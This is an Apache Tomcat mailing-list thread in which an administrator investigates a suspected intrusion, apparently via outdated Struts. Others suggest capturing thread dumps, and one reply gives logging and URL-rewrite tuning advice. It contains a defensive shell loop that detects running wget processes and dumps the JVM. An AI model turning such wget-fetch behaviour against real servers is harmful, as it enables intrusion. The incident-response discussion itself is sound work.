>> > > To unsubscribe, e-mail: users-unsubscribe@tomcat.apache.org
>> > > For additional commands, e-mail: users-help@tomcat.apache.org
>> > >
>> > >
>>
>>
>
>
Re: Regarding i think an intrusion
Posted by Leonardo Santagostini <ls...@gmail.com>.
Hello all !
Developers are still "estimating the effort" for upgrading struts.... i
will let you know how things are going.
Thanks all for replying me.
Regards,
Leonardo
Saludos.-
Leonardo Santagostini
<http://ar.linkedin.com/in/santagostini>
2014-05-05 15:39 GMT-03:00 Martin Gainty <mg...@hotmail.com>:
> > Subject: Re: Regarding i think an intrusion
> > From: lsantagostini@gmail.com
> > To: users@tomcat.apache.org
> >
> > Hello Chris, but this logfile was only one day.
> MG>Ay Caramba!
> >
> > Maybe i had a concept mismatch trying to capture the exact moment when
> the
> > execution begins.
> >
> > My command was
> >
> > while [ true ]; do CUENTO=$(ps -fea | grep wget | grep -v grep | grep -v
> > "127.0.0.1" | wc -l); if [ $CUENTO -gt 0 ] ; then PIDJAVA=$(ps -fea |
> grep
> > java | grep -v grep | awk '{ print $2 }'); echo -e "Se encontro wget
> > corriendo, sacando dump de JVM..." ; kill -3 $PIDJAVA; fi; sleep 3; done
> >
> > Maybe too many dumps all togheter, now im trying to get a "live" capture
> > without luck =(
> >
> > If you know a better method, please letme know it.
> >
> > Thanks for your effort, knid regards,
> > Leonardo
> >
> > Saludos.-
> > Leonardo Santagostini
> MG>Tomcat APR no puede utilizar WebSockets con JDK 1.6 ...necesita
> utilizar JDK @ 1.7 (ahora)
> MG>esto
> "ContainerBackgroundProcessor[StandardEngine[Catalina]]" daemon prio=10
> tid=0x0000000052867800 nid=0x2550 waiting on condition [0x000000004105e000]
> java.lang.Thread.State: TIMED_WAITING (sleeping)
> at java.lang.Thread.sleep(Native Method)
> at
> org.apache.catalina.core.ContainerBase$ContainerBackgroundProcessor.run(ContainerBase.java:1508)
> at java.lang.Thread.run(Thread.java:662)
> MG>Estos registros informativos producen MUCHO ruido
> MG>log4j.properties
> MG>log4j.logger.org.quartz=OFF //(Callate Quartz)
>
> MG>eso
> "ajp-bio-8009-exec-37" daemon prio=10 tid=0x00002aaac07fd800 nid=0x2656
> runnable [0x0000000046f34000]
> java.lang.Thread.State: RUNNABLE
> at java.util.regex.Pattern$6.isSatisfiedBy(Pattern.java:4763)
> at java.util.regex.Pattern$CharProperty.match(Pattern.java:3345)
> at java.util.regex.Pattern$Curly.match0(Pattern.java:3770)
> at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
> at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
> at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
> at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
> at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
> at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
> at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
> at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
> at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
> at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
> at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
> at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
> at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
> at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
> at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
> at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
> at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
> at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
> at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
> at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
> at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
> at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
> at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
> at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
> at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
> at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
> at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
> at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
> at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
> at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
> at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
> at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
> at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
> at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
> at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
> at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
> at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
> at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
> at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
> at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
> at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
> at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
> at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
> at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
> at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
> at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
> at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
> at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
> at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
> at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
> at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
> at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
> at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
> at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
> at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
> at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
> at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
> at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
> at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
> at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
> at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
> at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
> at java.util.regex.Pattern$Loop.match(Pattern.java:4282)
> at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
> at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
> at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
> at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
> at java.util.regex.Pattern$Loop.matchInit(Pattern.java:4311)
> at java.util.regex.Pattern$Prolog.match(Pattern.java:4251)
> at java.util.regex.Pattern$Branch.match(Pattern.java:4114)
> at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
> at java.util.regex.Pattern$BmpCharProperty.match(Pattern.java:3366)
> at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
> at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
> at java.util.regex.Pattern$SliceI.match(Pattern.java:3507)
> at java.util.regex.Pattern$Begin.match(Pattern.java:3120)
> MG>DEMASIADO!
> MG>necesita cambiar match-type desde regex at wildcard en Tuckey
> .\WEB-INF\urlrewrite.xml...por ejemplo
> <!-- regex no es necessario -->
> <!-- rule match-type="regex">
> <name>BasicRule</name>
> <from>basicfrom</from>
> <to>basicto</to>
> </rule -->
> <rule match-type="wildcard">
> <name>BasicRule</name>
> <from>basicfrom</from>
> <to>basicto</to>
> </rule>
> MG>puedes ver que nombre, desde y a son los mismos
>
> MG>Cada vez que veas 'Runnable' y 'locked' (por ejemplo)
> "http-bio-8080-exec-28" daemon prio=10 tid=0x0000000044c5f800 nid=0xe9d
> waiting on condition [0x000000004ad9b000]
> java.lang.Thread.State: RUNNABLE
> at java.util.Vector.addElement(Vector.java:572)
> - locked <0x00000006e031b010> (a org.apache.log4j.ProvisionNode)
> at org.apache.log4j.Hierarchy.updateParents(Hierarchy.java:509)
> at org.apache.log4j.Hierarchy.getLogger(Hierarchy.java:273)
> - locked <0x00000006e0303d80> (a java.util.Hashtable)
>
> MG>necessita mata el proceso o cambia proceso lento ...(log4j
> updateParents) por ejemplo en log4j
> package org.apache.log4j;
> public class Hierarchy implements org.apache.log4j.spi.LoggerFactory,
> org.apache.log4j.spi.RendererSupport{
> private org.apache.log4j.spi.LoggerFactory defaultFactory;
> private java.util.Vector listeners;
> // Hashtable ht;
> java.util.ConcurrentHashMap<String,ProvisionNode> ht=new
> java.util.ConcurrentHashMap<String,ProvisionNode>();
>
> //mucho mas tarde
> public Logger getLogger(String name, org.apache.log4j.spi.LoggerFactory
> factory) {
> {
> ....
> } else if (o instanceof org.apache.log4j.ProvisionNode) {
> //System.out.println("("+name+") ht.get(this) returned ProvisionNode");
> logger = factory.makeNewLoggerInstance(name);
> logger.setHierarchy(this);
> ht.put(key, logger);
> updateChildren((ProvisionNode) o, logger);
> updateParents(logger);
> return logger;
> }
>
>
> http://docs.oracle.com/javase/7/docs/api/java/util/concurrent/ConcurrentHashMap.html
> MG>Entiendes?
> MG>Martín
>
> >
> > <http://ar.linkedin.com/in/santagostini>
> >
> >
> >
> >
> >
> > 2014-05-05 13:06 GMT-03:00 Christopher Schultz <
> chris@christopherschultz.net
> > >:
> >
> > > -----BEGIN PGP SIGNED MESSAGE-----
> > > Hash: SHA256
> > >
> > > Leonardo,
> > >
> > > On 5/5/14, 11:12 AM, Leonardo Santagostini wrote:
> > > > Ok, again its uploaded.
> > > >
> > > > This is the link
> > > >
> > > >
> > >
> https://drive.google.com/file/d/0B5oeFmSS7h7EOFE5Nk9KMmd4RFE/edit?usp=sharing
> > >
> > > 1/2
> > > >
> > > GiB log file? Hrm.
> > >
> > > It doesn't even have any calls to Runtime.exec in it. If you have a
> > > snapshot of a thread dump (and only the thread dump, I don't need 3
> > > weeks of your logs) that you took while the "intrusion" was taking
> > > place, post that.
> > >
> > > If you don't, then I think you're out of luck.
> > >
> > > Sounds like a bad time to go on holiday.
> > >
> > > - -chris
> > > -----BEGIN PGP SIGNATURE-----
> > > Version: GnuPG v1
> > > Comment: GPGTools - http://gpgtools.org
> > > Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/
> > >
> > > iQIcBAEBCAAGBQJTZ7cEAAoJEBzwKT+lPKRYg0cP/1KH8lflN/Gdt8KJPJsOvmrs
> > > Jqok5NA6CsYZhI9AjxiCzK54O+HRrv8qpy9oyk1l4yCv7ims3Zd6PI6YmMmMjYbO
> > > TQiJ0ufWNI4mGj9WesHWPtFsSRsKfkhISXfKhdi3jO4p+uH03SkFivGMrKzRqkX/
> > > IKVRV6lh2we3RFY/D/Vb0ptC/lSoy04tSI1H9IYJARI0DDh2tbVtJI1GvTp+qFch
> > > mm4/FTEh6a8XrE09EUvfyeFZKx5anEw0ybo0tU3TQHY76yOKHdP+ySjYBVGbjOx3
> > > Ma38x1OqWBhwlfBlQbbHWl+QHbC7WhR4KHo+Aif+gQIF+DDgMURaRkJZepSzCUCt
> > > az6CKVllIErzN5eimwJxRYGFTDCn/3aRw/0Pvy7WIuReiqhaJh16PdUJCXAX8w/m
> > > Vxf+3rCziAgcTlVHJzDepQVnSOG5XYWpVNTdTwMwrKw1dWIQC9Iya8gK8R2Ynzpt
> > > kzeANOyhJE9fsmVpTxv5mx4CJuai/jF66BI92oBRnVOqr5sfAhzpstR59Njzw0H8
> > > tHPF/XfhII1AEeLJpCiFw7PgO/zLtu6R0Z6mXnuC3vNJ0HesWaumRhqzPy9of+m/
> > > 0FBZ5rMdPOrMY9vtnCUjTOzRWxlm0qQHI7g1UqmawtRZNuv47rkTPD92MubzAlSB
> > > EcwrNcX2iZ+JXXtSTnzH
> > > =nxGK
> > > -----END PGP SIGNATURE-----
> > >
> > > ---------------------------------------------------------------------
> > > To unsubscribe, e-mail: users-unsubscribe@tomcat.apache.org
> > > For additional commands, e-mail: users-help@tomcat.apache.org
> > >
> > >
>
>
RE: Regarding i think an intrusion
Posted by Martin Gainty <mg...@hotmail.com>.
> Subject: Re: Regarding i think an intrusion
> From: lsantagostini@gmail.com
> To: users@tomcat.apache.org
>
> Hello Chris, but this logfile was only one day.
MG>Ay Caramba!
>
> Maybe i had a concept mismatch trying to capture the exact moment when the
> execution begins.
>
> My command was
>
> while [ true ]; do CUENTO=$(ps -fea | grep wget | grep -v grep | grep -v
> "127.0.0.1" | wc -l); if [ $CUENTO -gt 0 ] ; then PIDJAVA=$(ps -fea | grep
> java | grep -v grep | awk '{ print $2 }'); echo -e "Se encontro wget
> corriendo, sacando dump de JVM..." ; kill -3 $PIDJAVA; fi; sleep 3; done
>
> Maybe too many dumps all togheter, now im trying to get a "live" capture
> without luck =(
>
> If you know a better method, please letme know it.
>
> Thanks for your effort, knid regards,
> Leonardo
>
> Saludos.-
> Leonardo Santagostini
MG>Tomcat APR no puede utilizar WebSockets con JDK 1.6 ...necesita utilizar JDK @ 1.7 (ahora)
MG>esto
"ContainerBackgroundProcessor[StandardEngine[Catalina]]" daemon prio=10 tid=0x0000000052867800 nid=0x2550 waiting on condition [0x000000004105e000]
java.lang.Thread.State: TIMED_WAITING (sleeping)
at java.lang.Thread.sleep(Native Method)
at org.apache.catalina.core.ContainerBase$ContainerBackgroundProcessor.run(ContainerBase.java:1508)
at java.lang.Thread.run(Thread.java:662)
MG>Estos registros informativos producen MUCHO ruido
MG>log4j.properties
MG>log4j.logger.org.quartz=OFF //(Callate Quartz)
MG>eso
"ajp-bio-8009-exec-37" daemon prio=10 tid=0x00002aaac07fd800 nid=0x2656 runnable [0x0000000046f34000]
java.lang.Thread.State: RUNNABLE
at java.util.regex.Pattern$6.isSatisfiedBy(Pattern.java:4763)
at java.util.regex.Pattern$CharProperty.match(Pattern.java:3345)
at java.util.regex.Pattern$Curly.match0(Pattern.java:3770)
at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
at java.util.regex.Pattern$Loop.match(Pattern.java:4282)
at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
at java.util.regex.Pattern$Loop.matchInit(Pattern.java:4311)
at java.util.regex.Pattern$Prolog.match(Pattern.java:4251)
at java.util.regex.Pattern$Branch.match(Pattern.java:4114)
at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
at java.util.regex.Pattern$BmpCharProperty.match(Pattern.java:3366)
at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
at java.util.regex.Pattern$SliceI.match(Pattern.java:3507)
at java.util.regex.Pattern$Begin.match(Pattern.java:3120)
MG>DEMASIADO!
MG>necesita cambiar match-type desde regex at wildcard en Tuckey .\WEB-INF\urlrewrite.xml...por ejemplo
<!-- regex no es necessario -->
<!-- rule match-type="regex">
<name>BasicRule</name>
<from>basicfrom</from>
<to>basicto</to>
</rule -->
<rule match-type="wildcard">
<name>BasicRule</name>
<from>basicfrom</from>
<to>basicto</to>
</rule>
MG>puedes ver que nombre, desde y a son los mismos
MG>Cada vez que veas 'Runnable' y 'locked' (por ejemplo)
"http-bio-8080-exec-28" daemon prio=10 tid=0x0000000044c5f800 nid=0xe9d waiting on condition [0x000000004ad9b000]
java.lang.Thread.State: RUNNABLE
at java.util.Vector.addElement(Vector.java:572)
- locked <0x00000006e031b010> (a org.apache.log4j.ProvisionNode)
at org.apache.log4j.Hierarchy.updateParents(Hierarchy.java:509)
at org.apache.log4j.Hierarchy.getLogger(Hierarchy.java:273)
- locked <0x00000006e0303d80> (a java.util.Hashtable)
MG>necessita mata el proceso o cambia proceso lento ...(log4j updateParents) por ejemplo en log4j
package org.apache.log4j;
public class Hierarchy implements org.apache.log4j.spi.LoggerFactory, org.apache.log4j.spi.RendererSupport{
private org.apache.log4j.spi.LoggerFactory defaultFactory;
private java.util.Vector listeners;
// Hashtable ht;
java.util.ConcurrentHashMap<String,ProvisionNode> ht=new java.util.ConcurrentHashMap<String,ProvisionNode>();
//mucho mas tarde
public Logger getLogger(String name, org.apache.log4j.spi.LoggerFactory factory) {
{
....
} else if (o instanceof org.apache.log4j.ProvisionNode) {
//System.out.println("("+name+") ht.get(this) returned ProvisionNode");
logger = factory.makeNewLoggerInstance(name);
logger.setHierarchy(this);
ht.put(key, logger);
updateChildren((ProvisionNode) o, logger);
updateParents(logger);
return logger;
}
http://docs.oracle.com/javase/7/docs/api/java/util/concurrent/ConcurrentHashMap.html
MG>Entiendes?
MG>Martín
>
> <http://ar.linkedin.com/in/santagostini>
>
>
>
>
>
> 2014-05-05 13:06 GMT-03:00 Christopher Schultz <chris@christopherschultz.net
> >:
>
> > -----BEGIN PGP SIGNED MESSAGE-----
> > Hash: SHA256
> >
> > Leonardo,
> >
> > On 5/5/14, 11:12 AM, Leonardo Santagostini wrote:
> > > Ok, again its uploaded.
> > >
> > > This is the link
> > >
> > >
> > https://drive.google.com/file/d/0B5oeFmSS7h7EOFE5Nk9KMmd4RFE/edit?usp=sharing
> >
> > 1/2
> > >
> > GiB log file? Hrm.
> >
> > It doesn't even have any calls to Runtime.exec in it. If you have a
> > snapshot of a thread dump (and only the thread dump, I don't need 3
> > weeks of your logs) that you took while the "intrusion" was taking
> > place, post that.
> >
> > If you don't, then I think you're out of luck.
> >
> > Sounds like a bad time to go on holiday.
> >
> > - -chris
> > -----BEGIN PGP SIGNATURE-----
> > Version: GnuPG v1
> > Comment: GPGTools - http://gpgtools.org
> > Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/
> >
> > iQIcBAEBCAAGBQJTZ7cEAAoJEBzwKT+lPKRYg0cP/1KH8lflN/Gdt8KJPJsOvmrs
> > Jqok5NA6CsYZhI9AjxiCzK54O+HRrv8qpy9oyk1l4yCv7ims3Zd6PI6YmMmMjYbO
> > TQiJ0ufWNI4mGj9WesHWPtFsSRsKfkhISXfKhdi3jO4p+uH03SkFivGMrKzRqkX/
> > IKVRV6lh2we3RFY/D/Vb0ptC/lSoy04tSI1H9IYJARI0DDh2tbVtJI1GvTp+qFch
> > mm4/FTEh6a8XrE09EUvfyeFZKx5anEw0ybo0tU3TQHY76yOKHdP+ySjYBVGbjOx3
> > Ma38x1OqWBhwlfBlQbbHWl+QHbC7WhR4KHo+Aif+gQIF+DDgMURaRkJZepSzCUCt
> > az6CKVllIErzN5eimwJxRYGFTDCn/3aRw/0Pvy7WIuReiqhaJh16PdUJCXAX8w/m
> > Vxf+3rCziAgcTlVHJzDepQVnSOG5XYWpVNTdTwMwrKw1dWIQC9Iya8gK8R2Ynzpt
> > kzeANOyhJE9fsmVpTxv5mx4CJuai/jF66BI92oBRnVOqr5sfAhzpstR59Njzw0H8
> > tHPF/XfhII1AEeLJpCiFw7PgO/zLtu6R0Z6mXnuC3vNJ0HesWaumRhqzPy9of+m/
> > 0FBZ5rMdPOrMY9vtnCUjTOzRWxlm0qQHI7g1UqmawtRZNuv47rkTPD92MubzAlSB
> > EcwrNcX2iZ+JXXtSTnzH
> > =nxGK
> > -----END PGP SIGNATURE-----
> >
> > ---------------------------------------------------------------------
> > To unsubscribe, e-mail: users-unsubscribe@tomcat.apache.org
> > For additional commands, e-mail: users-help@tomcat.apache.org
> >
> >
Re: Regarding i think an intrusion
Posted by Leonardo Santagostini <ls...@gmail.com>.
Hello Chris, but this logfile was only one day.
Maybe i had a concept mismatch trying to capture the exact moment when the
execution begins.
My command was
while [ true ]; do CUENTO=$(ps -fea | grep wget | grep -v grep | grep -v
"127.0.0.1" | wc -l); if [ $CUENTO -gt 0 ] ; then PIDJAVA=$(ps -fea | grep
java | grep -v grep | awk '{ print $2 }'); echo -e "Se encontro wget
corriendo, sacando dump de JVM..." ; kill -3 $PIDJAVA; fi; sleep 3; done
Maybe too many dumps all togheter, now im trying to get a "live" capture
without luck =(
If you know a better method, please letme know it.
Thanks for your effort, knid regards,
Leonardo
Saludos.-
Leonardo Santagostini
<http://ar.linkedin.com/in/santagostini>
2014-05-05 13:06 GMT-03:00 Christopher Schultz <chris@christopherschultz.net
>:
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA256
>
> Leonardo,
>
> On 5/5/14, 11:12 AM, Leonardo Santagostini wrote:
> > Ok, again its uploaded.
> >
> > This is the link
> >
> >
> https://drive.google.com/file/d/0B5oeFmSS7h7EOFE5Nk9KMmd4RFE/edit?usp=sharing
>
> 1/2
> >
> GiB log file? Hrm.
>
> It doesn't even have any calls to Runtime.exec in it. If you have a
> snapshot of a thread dump (and only the thread dump, I don't need 3
> weeks of your logs) that you took while the "intrusion" was taking
> place, post that.
>
> If you don't, then I think you're out of luck.
>
> Sounds like a bad time to go on holiday.
>
> - -chris
> -----BEGIN PGP SIGNATURE-----
> Version: GnuPG v1
> Comment: GPGTools - http://gpgtools.org
> Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/
>
> iQIcBAEBCAAGBQJTZ7cEAAoJEBzwKT+lPKRYg0cP/1KH8lflN/Gdt8KJPJsOvmrs
> Jqok5NA6CsYZhI9AjxiCzK54O+HRrv8qpy9oyk1l4yCv7ims3Zd6PI6YmMmMjYbO
> TQiJ0ufWNI4mGj9WesHWPtFsSRsKfkhISXfKhdi3jO4p+uH03SkFivGMrKzRqkX/
> IKVRV6lh2we3RFY/D/Vb0ptC/lSoy04tSI1H9IYJARI0DDh2tbVtJI1GvTp+qFch
> mm4/FTEh6a8XrE09EUvfyeFZKx5anEw0ybo0tU3TQHY76yOKHdP+ySjYBVGbjOx3
> Ma38x1OqWBhwlfBlQbbHWl+QHbC7WhR4KHo+Aif+gQIF+DDgMURaRkJZepSzCUCt
> az6CKVllIErzN5eimwJxRYGFTDCn/3aRw/0Pvy7WIuReiqhaJh16PdUJCXAX8w/m
> Vxf+3rCziAgcTlVHJzDepQVnSOG5XYWpVNTdTwMwrKw1dWIQC9Iya8gK8R2Ynzpt
> kzeANOyhJE9fsmVpTxv5mx4CJuai/jF66BI92oBRnVOqr5sfAhzpstR59Njzw0H8
> tHPF/XfhII1AEeLJpCiFw7PgO/zLtu6R0Z6mXnuC3vNJ0HesWaumRhqzPy9of+m/
> 0FBZ5rMdPOrMY9vtnCUjTOzRWxlm0qQHI7g1UqmawtRZNuv47rkTPD92MubzAlSB
> EcwrNcX2iZ+JXXtSTnzH
> =nxGK
> -----END PGP SIGNATURE-----
>
> ---------------------------------------------------------------------
> To unsubscribe, e-mail: users-unsubscribe@tomcat.apache.org
> For additional commands, e-mail: users-help@tomcat.apache.org
>
>
Re: Regarding i think an intrusion
Posted by Christopher Schultz <ch...@christopherschultz.net>.
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
Leonardo,
On 5/5/14, 11:12 AM, Leonardo Santagostini wrote:
> Ok, again its uploaded.
>
> This is the link
>
> https://drive.google.com/file/d/0B5oeFmSS7h7EOFE5Nk9KMmd4RFE/edit?usp=sharing
1/2
>
GiB log file? Hrm.
It doesn't even have any calls to Runtime.exec in it. If you have a
snapshot of a thread dump (and only the thread dump, I don't need 3
weeks of your logs) that you took while the "intrusion" was taking
place, post that.
If you don't, then I think you're out of luck.
Sounds like a bad time to go on holiday.
- -chris
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1
Comment: GPGTools - http://gpgtools.org
Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/
iQIcBAEBCAAGBQJTZ7cEAAoJEBzwKT+lPKRYg0cP/1KH8lflN/Gdt8KJPJsOvmrs
Jqok5NA6CsYZhI9AjxiCzK54O+HRrv8qpy9oyk1l4yCv7ims3Zd6PI6YmMmMjYbO
TQiJ0ufWNI4mGj9WesHWPtFsSRsKfkhISXfKhdi3jO4p+uH03SkFivGMrKzRqkX/
IKVRV6lh2we3RFY/D/Vb0ptC/lSoy04tSI1H9IYJARI0DDh2tbVtJI1GvTp+qFch
mm4/FTEh6a8XrE09EUvfyeFZKx5anEw0ybo0tU3TQHY76yOKHdP+ySjYBVGbjOx3
Ma38x1OqWBhwlfBlQbbHWl+QHbC7WhR4KHo+Aif+gQIF+DDgMURaRkJZepSzCUCt
az6CKVllIErzN5eimwJxRYGFTDCn/3aRw/0Pvy7WIuReiqhaJh16PdUJCXAX8w/m
Vxf+3rCziAgcTlVHJzDepQVnSOG5XYWpVNTdTwMwrKw1dWIQC9Iya8gK8R2Ynzpt
kzeANOyhJE9fsmVpTxv5mx4CJuai/jF66BI92oBRnVOqr5sfAhzpstR59Njzw0H8
tHPF/XfhII1AEeLJpCiFw7PgO/zLtu6R0Z6mXnuC3vNJ0HesWaumRhqzPy9of+m/
0FBZ5rMdPOrMY9vtnCUjTOzRWxlm0qQHI7g1UqmawtRZNuv47rkTPD92MubzAlSB
EcwrNcX2iZ+JXXtSTnzH
=nxGK
-----END PGP SIGNATURE-----
---------------------------------------------------------------------
To unsubscribe, e-mail: users-unsubscribe@tomcat.apache.org
For additional commands, e-mail: users-help@tomcat.apache.org
Re: Regarding i think an intrusion
Posted by Leonardo Santagostini <ls...@gmail.com>.
Ok, again its uploaded.
This is the link
https://drive.google.com/file/d/0B5oeFmSS7h7EOFE5Nk9KMmd4RFE/edit?usp=sharing
Kind regards !,
Leonardo
Saludos.-
Leonardo Santagostini
<http://ar.linkedin.com/in/santagostini>
2014-05-05 11:57 GMT-03:00 Christopher Schultz <chris@christopherschultz.net
>:
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA256
>
> Leonardo,
>
> On 5/5/14, 10:29 AM, Leonardo Santagostini wrote:
> > Well thread dump is here
> >
> >
> https://drive.google.com/file/d/0B5oeFmSS7h7EczdXMEF3eXRBSlk/edit?usp=sharing
>
> Seems
> >
> like it's broken.
>
> - -chris
> -----BEGIN PGP SIGNATURE-----
> Version: GnuPG v1
